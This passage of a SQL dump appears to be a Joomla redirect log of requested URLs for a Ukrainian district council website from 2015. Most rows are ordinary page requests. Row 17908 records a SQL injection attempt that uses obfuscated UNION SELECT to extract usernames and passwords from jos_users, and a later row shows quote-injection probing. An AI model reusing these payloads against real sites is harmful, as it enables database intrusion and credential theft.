00:00:00',301),(17796,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7&Itemid=12&lang=uk','','','',1,0,'2015-11-08 04:52:04','0000-00-00 00:00:00',301),(17797,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=699:-2011-2015-&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-08 04:52:04','0000-00-00 00:00:00',301),(17798,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6&Itemid=9&lang=uk','','','',2,0,'2015-11-08 04:52:09','0000-00-00 00:00:00',301),(17799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=615:-------26032012495-12&catid=40:--28032012-&Itemid=77&lang=uk','','','',1,0,'2015-11-08 04:52:11','0000-00-00 00:00:00',301),(17800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5&Itemid=6&lang=uk','','','',1,0,'2015-11-08 05:01:56','0000-00-00 00:00:00',301),(17801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35:2011-06-30-10-56-57&Itemid=69&lang=uk','','','',3,0,'2015-11-08 05:02:00','0000-00-00 00:00:00',301),(17802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4:2010-06-05-12-51-18&Itemid=8&lang=uk','','','',1,0,'2015-11-08 05:02:00','0000-00-00 00:00:00',301),(17803,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=ru&limitstart=25','','','',1,0,'2015-11-08 05:02:00','0000-00-00 00:00:00',301),(17804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=uk','','','',12,0,'2015-11-08 05:02:00','0000-00-00 00:00:00',301),(17805,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=ru&limitstart=10','','','',1,0,'2015-11-08 05:02:01','0000-00-00 00:00:00',301),(17806,'http://www.malyn-rayrada.org.ua/attachments/005_history malyn region2.PDF','','','',36,0,'2015-11-08 05:02:20','0000-00-00 00:00:00',301),(17807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=uk','','','',5,0,'2015-11-08 05:02:33','0000-00-00 00:00:00',301),(17809,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1109-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-yaki-nadayutsya-v-orendu-gr-yakimenko-n','','','',1,0,'2015-11-08 05:03:09','0000-00-00 00:00:00',301),(17810,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/66-pro-utvorennja-postijnih-komisij-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 05:03:09','0000-00-00 00:00:00',301),(17811,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/492-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-08 05:03:11','0000-00-00 00:00:00',301),(17812,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/487-pro-vikoristannja-koshtiv-shho-nadijshli-u_2','','','',27,0,'2015-11-08 05:03:31','0000-00-00 00:00:00',301),(17813,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',3,0,'2015-11-08 05:03:32','0000-00-00 00:00:00',301),(17814,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',1,0,'2015-11-08 05:03:34','0000-00-00 00:00:00',301),(17815,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',2,0,'2015-11-08 05:03:35','0000-00-00 00:00:00',301),(17816,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-obâ€ââ€Ãâ','','','',1,0,'2015-11-08 05:03:35','0000-00-00 00:00:00',301),(17817,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',3,0,'2015-11-08 05:03:35','0000-00-00 00:00:00',301),(17818,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',4,0,'2015-11-08 05:03:35','0000-00-00 00:00:00',301),(17819,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/343-pro-zatverdzhennja-polozhennja-pro-porjadok_3','','','',15,0,'2015-11-08 05:03:41','0000-00-00 00:00:00',301),(17820,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/36-pro-klopotannja-shhodo-pripinennja-prava?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-08 05:04:09','0000-00-00 00:00:00',301),(17821,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/822-pro-stan-utrimannja-avtomobilnih-dorig-i-bezpeku','','','',31,0,'2015-11-08 05:04:10','0000-00-00 00:00:00',301),(17822,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?limitstart=0','','','',11,0,'2015-11-08 05:04:11','0000-00-00 00:00:00',301),(17823,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/574-pro-klopotannja-pered-zhitomirskoju-oblasnoju','','','',15,0,'2015-11-08 05:04:13','0000-00-00 00:00:00',301),(17824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=702:-2011-2013-&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-08 05:04:18','0000-00-00 00:00:00',301),(17825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=703:-2012-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-11-08 05:04:57','0000-00-00 00:00:00',301),(17826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-11-08 05:05:00','0000-00-00 00:00:00',301),(17827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=514:2011-12-22-10-03-07&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-08 05:05:01','0000-00-00 00:00:00',301),(17828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=789:-2012-2014-&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-11-08 05:05:03','0000-00-00 00:00:00',301),(17829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=541:2012-01-26-11-55-32&catid=39&Itemid=76&lang=uk','','','',3,0,'2015-11-08 05:05:03','0000-00-00 00:00:00',301),(17830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=542:-2011-&catid=39:-22022012-&Itemid=76&lang=uk','','','',3,0,'2015-11-08 05:05:03','0000-00-00 00:00:00',301),(17831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=39&Itemid=76&lang=uk','','','',5,0,'2015-11-08 05:05:04','0000-00-00 00:00:00',301),(17832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=545:2012-01-26-12-06-01&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-11-08 05:05:05','0000-00-00 00:00:00',301),(17833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',1,0,'2015-11-08 05:05:05','0000-00-00 00:00:00',301),(17834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-08 05:05:06','0000-00-00 00:00:00',301),(17835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=ru&limitstart=20','','','',2,0,'2015-11-08 05:10:23','0000-00-00 00:00:00',301),(17836,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&id=44&lang=en&layout=blog&option=com_content&view=category','','http://go.mail.ru/search_images','',3,0,'2015-11-08 05:11:58','0000-00-00 00:00:00',301),(17837,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/174-pro-edinij-den-deputata','','','',16,0,'2015-11-08 05:21:34','0000-00-00 00:00:00',301),(17838,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-11-08 07:29:31','0000-00-00 00:00:00',301),(17841,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=21','','','',15,0,'2015-11-08 10:00:12','0000-00-00 00:00:00',301),(17842,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1160-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-16-11-2010r-5-pro-utvorennya-postijnikh-komisij-rajonnoji-radi-zatver','','','',1,0,'2015-11-08 10:00:34','0000-00-00 00:00:00',301),(17844,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/7-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi','','','',14,0,'2015-11-08 10:06:24','0000-00-00 00:00:00',301),(17845,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/980-pro-vikonannya-planu-roboti-rajonnoji-radi-za-2014-rik-ta-plan-roboti-rajonnoji-radi-na-i-pivrichchya-2015-roku','','','',6,0,'2015-11-08 10:07:51','0000-00-00 00:00:00',301),(17846,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/367-pro-peredachu-materialnih-cinnostej?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 10:08:04','0000-00-00 00:00:00',301),(17847,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/924-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-z-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-fop-rikhalskij-o-a','','','',4,0,'2015-11-08 10:08:35','0000-00-00 00:00:00',301),(17848,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/964-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-gr-baranovskomu-m-m','','','',6,0,'2015-11-08 10:09:40','0000-00-00 00:00:00',301),(17849,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&catid=44:--12092012-&id=757:2012-09-12-09-47-49&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-08 10:40:33','0000-00-00 00:00:00',301),(17850,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-08 12:05:55','0000-00-00 00:00:00',301),(17851,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/530-pro-nadannja-dozvolu-na-rozroblennja-detalnogo','','','',2,0,'2015-11-08 12:27:47','0000-00-00 00:00:00',301),(17852,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/358-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 12:37:47','0000-00-00 00:00:00',301),(17853,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/382-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-08 12:37:49','0000-00-00 00:00:00',301),(17854,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/789-pro-peredachu-budivli-lokomotivnogo-depo-na-balans_2','','','',6,0,'2015-11-08 13:09:31','0000-00-00 00:00:00',301),(17855,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-08 13:46:31','0000-00-00 00:00:00',301),(17856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38&layout=blog&Itemid=73&lang=uk','','','',3,0,'2015-11-08 14:06:27','0000-00-00 00:00:00',301),(17857,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-08 15:16:48','0000-00-00 00:00:00',301),(17858,'http://malyn-rayrada.org.ua/attachments/article/1122/Зайцева.pdf','','','',4,0,'2015-11-08 16:55:45','0000-00-00 00:00:00',301),(17859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:---------2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2015-11-08 16:58:57','0000-00-00 00:00:00',301),(17860,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=635:-2011-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-08 17:01:22','0000-00-00 00:00:00',301),(17861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=594:-lr-&catid=40&Itemid=77&lang=ru','','','',14,0,'2015-11-08 21:16:43','0000-00-00 00:00:00',301),(17862,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1242:-25-2011-74-19-2011-193-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-08 21:47:14','0000-00-00 00:00:00',301),(17864,'http://malyn-rayrada.org.ua/attachments/article/1122/Пустовойтенко.pdf','','','',3,0,'2015-11-09 01:42:11','0000-00-00 00:00:00',301),(17865,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/392-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_15','','','',12,0,'2015-11-09 01:46:28','0000-00-00 00:00:00',301),(17866,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-?limitstart=0','','','',6,0,'2015-11-09 05:02:46','0000-00-00 00:00:00',301),(17867,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=521:-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-09 05:29:57','0000-00-00 00:00:00',301),(17868,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=505:2011-12-16-13-24-32&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-09 05:42:37','0000-00-00 00:00:00',301),(17869,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku','','','',9,0,'2015-11-09 08:17:48','0000-00-00 00:00:00',301),(17870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&catid=42:--16052012-&Itemid=80&lang=uk','','','',8,0,'2015-11-09 08:22:35','0000-00-00 00:00:00',301),(17871,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&id=30&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-09 10:21:17','0000-00-00 00:00:00',301),(17872,'http://malyn-rayrada.org.ua/attachments/006_history malyn region3.PDF','','','',2,0,'2015-11-09 10:48:05','0000-00-00 00:00:00',301),(17873,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=en&layout=blog&option=com_content&view=category','','http://go.mail.ru/search_images','',4,0,'2015-11-09 11:39:58','0000-00-00 00:00:00',301),(17874,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=996:2013-04-25-12-09-57&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-09 11:58:29','0000-00-00 00:00:00',301),(17878,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/214-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii','','','',7,0,'2015-11-09 14:31:09','0000-00-00 00:00:00',301),(17879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=52&Itemid=93&lang=uk','','','',10,0,'2015-11-09 14:32:16','0000-00-00 00:00:00',301),(17880,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45&layout=blog&Itemid=84&lang=uk&limitstart=25','','','',2,0,'2015-11-09 16:04:47','0000-00-00 00:00:00',301),(17881,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=uk&limitstart=25','','','',2,0,'2015-11-09 16:07:58','0000-00-00 00:00:00',301),(17882,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=546:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-09 16:52:27','0000-00-00 00:00:00',301),(17883,'http://malyn-rayrada.org.ua/index.php/1140-starovorob-jivska-silska-rada-informue','','','',16,0,'2015-11-09 18:09:27','0000-00-00 00:00:00',301),(17884,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik','','','',7,0,'2015-11-09 18:10:14','0000-00-00 00:00:00',301),(17885,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1012-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki','','','',8,0,'2015-11-09 18:22:08','0000-00-00 00:00:00',301),(17886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=143:2010-10-15-07-33-13&catid=11&lang=uk','','','',2,0,'2015-11-09 18:35:46','0000-00-00 00:00:00',301),(17888,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&id=57:--15042014-&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2015-11-09 23:19:33','0000-00-00 00:00:00',301),(17889,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=596:2012-02-28-12-59-05&catid=40:--28032012-&Itemid=77&lang=en','','','',2,0,'2015-11-09 23:31:26','0000-00-00 00:00:00',301),(17890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=ru&limitstart=5','','','',7,0,'2015-11-09 23:50:46','0000-00-00 00:00:00',301),(17891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=596:2012-02-28-12-59-05&catid=40:--28032012-&Itemid=77&lang=en','','','',2,0,'2015-11-09 23:52:16','0000-00-00 00:00:00',301),(17892,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1088-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-nadannya-praktichnoji-dopomogi-v-pitanni-rozblokuvannya-rakhunkiv-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-malinskoji','','','',1,0,'2015-11-09 23:55:58','0000-00-00 00:00:00',301),(17894,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',3,0,'2015-11-10 00:45:12','0000-00-00 00:00:00',301),(17895,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2015-11-10 00:54:29','0000-00-00 00:00:00',301),(17896,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=364:-i-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-10 01:11:29','0000-00-00 00:00:00',301),(17897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=486:-l-28r&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-11-10 01:51:48','0000-00-00 00:00:00',301),(17898,'http://malyn-rayrada.org.ua/attachments/article/1122/Чапік.pdf','','','',6,0,'2015-11-10 02:05:09','0000-00-00 00:00:00',301),(17900,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1043:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-10 04:10:34','0000-00-00 00:00:00',301),(17901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=364:-i-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2015-11-10 05:19:09','0000-00-00 00:00:00',301),(17902,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1249:2014-03-24-06-41-46&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-10 05:27:02','0000-00-00 00:00:00',301),(17903,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',3,0,'2015-11-10 06:13:27','0000-00-00 00:00:00',301),(17905,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/233-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_9','','','',12,0,'2015-11-10 08:29:05','0000-00-00 00:00:00',301),(17906,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-','','','',22,0,'2015-11-10 09:21:17','0000-00-00 00:00:00',301),(17908,'http://malyn-rayrada.org.ua/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concatusername,0x3a,password,0x3a,usertype/**//*!from*//**/jos_users/**/&tmpl=component','','','',1,0,'2015-11-10 13:41:48','0000-00-00 00:00:00',301),(17909,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=530:-4050-vi-l-r-1-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',25,0,'2015-11-10 14:45:47','0000-00-00 00:00:00',301),(17911,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=605:-l-r-i-iii-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-10 15:15:53','0000-00-00 00:00:00',301),(17912,'http://www.malyn-rayrada.org.ua/index.php?catid=5:2010-06-05-12-51-34&id=166:-6-&Itemid=6&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-10 15:16:03','0000-00-00 00:00:00',301),(17913,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=808:2012-10-30-13-56-37&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-10 16:00:14','0000-00-00 00:00:00',301),(17914,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=481:-2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-10 17:37:17','0000-00-00 00:00:00',301),(17915,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?limitstart=0','','','',10,0,'2015-11-10 17:45:26','0000-00-00 00:00:00',301),(17916,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/282-pro-stvorennja-chopovickogo-osvitnogo-okrugu','','','',8,0,'2015-11-10 17:46:05','0000-00-00 00:00:00',301),(17917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=444:2011-10-24-07-04-45&catid=37:--21102011-&Itemid=72&lang=uk','','','',6,0,'2015-11-10 18:02:49','0000-00-00 00:00:00',301),(17918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=en&limitstart=20','','','',5,0,'2015-11-10 18:08:03','0000-00-00 00:00:00',301),(17919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-11-10 18:10:39','0000-00-00 00:00:00',301),(17920,'http://www.malyn-rayrada.org.ua/index.php/--29112013-/660-pro-situaciju-iz-obslugovuvannjam-miscevih','','','',2,0,'2015-11-10 18:14:01','0000-00-00 00:00:00',301),(17921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=ru&limitstart=10','','','',5,0,'2015-11-10 18:31:57','0000-00-00 00:00:00',301),(17922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=83&lang=uk','','','',15,0,'2015-11-10 18:39:25','0000-00-00 00:00:00',301),(17923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=195:------------2010-&catid=29&Itemid=60&lang=en','','','',4,0,'2015-11-10 18:51:44','0000-00-00 00:00:00',301),(17924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=uk&limitstart=10','','','',5,0,'2015-11-10 18:52:29','0000-00-00 00:00:00',301),(17925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=55&Itemid=96&lang=uk','','','',8,0,'2015-11-10 18:55:08','0000-00-00 00:00:00',301),(17926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38:--19122011-&layout=blog&Itemid=73&lang=uk','','','',3,0,'2015-11-10 19:20:52','0000-00-00 00:00:00',301),(17927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=176:2010-11-25-07-05-46&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',4,0,'2015-11-10 19:55:41','0000-00-00 00:00:00',301),(17928,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/114-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi','','','',16,0,'2015-11-10 21:18:41','0000-00-00 00:00:00',301),(17931,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/109-pro-programu-zabezpechennja-bezpeki-pri-vijavlenni','','','',12,0,'2015-11-10 22:22:35','0000-00-00 00:00:00',301),(17932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=674:2012-05-14-13-46-26&catid=11&lang=uk','','','',2,0,'2015-11-10 23:38:36','0000-00-00 00:00:00',301),(17933,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=864:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-10 23:56:51','0000-00-00 00:00:00',301),(17934,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=327:2011-05-20-16-20-26&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-11 01:32:31','0000-00-00 00:00:00',301),(17935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=605:-l-r-i-iii-&catid=11&lang=uk','','','',4,0,'2015-11-11 01:36:13','0000-00-00 00:00:00',301),(17936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42:--16052012-&Itemid=80&lang=en','','','',1,0,'2015-11-11 01:39:45','0000-00-00 00:00:00',301),(17937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=349:--------20--2011--108-l---r&catid=34:--15062011-&Itemid=68&lang=uk','','','',1,0,'2015-11-11 01:46:33','0000-00-00 00:00:00',301),(17938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=231:2011-01-06-08-26-07&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',6,0,'2015-11-11 02:03:39','0000-00-00 00:00:00',301),(17939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=uk','','','',4,0,'2015-11-11 02:05:14','0000-00-00 00:00:00',301),(17940,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=uk&start=7','','','',1,0,'2015-11-11 02:28:21','0000-00-00 00:00:00',301),(17941,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=597:-l-r-2011-&Itemid=77&lang=en&option=com_content&view=article','','','',3,0,'2015-11-11 02:39:40','0000-00-00 00:00:00',301),(17942,'http://www.malyn-rayrada.org.ua/index.php?id=37&Itemid=72&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-11 02:39:44','0000-00-00 00:00:00',301),(17943,'http://www.malyn-rayrada.org.ua/index.php?id=45&Itemid=84&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-11 02:39:48','0000-00-00 00:00:00',301),(17944,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/349-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_12','','','',4,0,'2015-11-11 02:41:09','0000-00-00 00:00:00',301),(17945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content\'&view=article\'&id=201:--------l-r--2011--\'&catid=29:--15122010-\'&itemid=60\'&lang=uk\'\"','','','',1,0,'2015-11-11 03:58:35','0000-00-00 